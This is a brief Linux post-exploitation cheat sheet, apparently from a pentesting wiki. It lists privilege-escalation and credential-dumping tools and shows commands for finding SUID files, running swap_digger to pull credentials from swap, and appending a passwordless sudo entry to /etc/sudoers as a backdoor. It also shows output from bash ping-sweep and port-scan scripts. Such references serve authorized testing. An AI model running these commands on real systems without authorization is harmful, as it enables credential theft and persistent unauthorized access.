Linux Post Exploitation
Post Exploitation on Linux
Common Tools
GTFOBins - GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems.
LinPEAS - Linux local Privilege Escalation Awesome Script (linPEAS) is a script that search for possible paths to escalate privileges on Linux/Unix.
pspy - Monitor linux processes without root permissions
pamspy - Credentials Dumper for Linux
SUID
Although SUID binaries can be detected using LinPEAS, you can also run the following command to identify SUID files on the system.
find / -perm -u=s -type f 2>/dev/null
swap_digger
swap_digger is a bash script used to automate Linux swap analysis for post-exploitation or forensics purpose. It automates swap extraction and searches for Linux user credentials, Web form credentials, Web form emails, HTTP basic authentication, WiFi SSID and keys, etc.
git clone https://github.com/sevagas/swap_digger.git
cd swap_digger
chmod +x swap_digger.sh
sudo ./swap_digger.sh -vx
mimipenguin
A tool to dump the login password from the current linux user.
Add User as Passwordless Sudo
echo 'asuka ALL=(ALL) NOPASSWD:ALL' | tee -a /etc/sudoers
Ping Sweep with Bash
➜ bash git:(main) bash ping-sweep.sh 192.168.1.1-254
192.168.1.1
192.168.1.4
192.168.1.5
192.168.1.2
192.168.1.7
192.168.1.8
192.168.1.15
192.168.1.30
192.168.1.14
192.168.1.24
192.168.1.12
192.168.1.22
Port Scan with Bash
Port scanning with netcat.
➜ bash git:(main) bash port-scan-nc.sh 192.168.1.1 1-5000
Scanning ports 1 to 5000 on 192.168.1.1...
[192.168.1.1] 21 (ftp) open
[192.168.1.1] 53 (domain) open
[192.168.1.1] 80 (http) open
[192.168.1.1] 443 (https) open
Simple TCP port scanning with bash.
➜ bash git:(main) bash port-scan.sh 192.168.1.1 1 5000
Scanning 192.168.1.1 (ports 1 to 5000)
PORT STATE SERVICE
21/tcp open ftp
53/tcp open domain
80/tcp open http
443/tcp open https
Last updated
Was this helpful?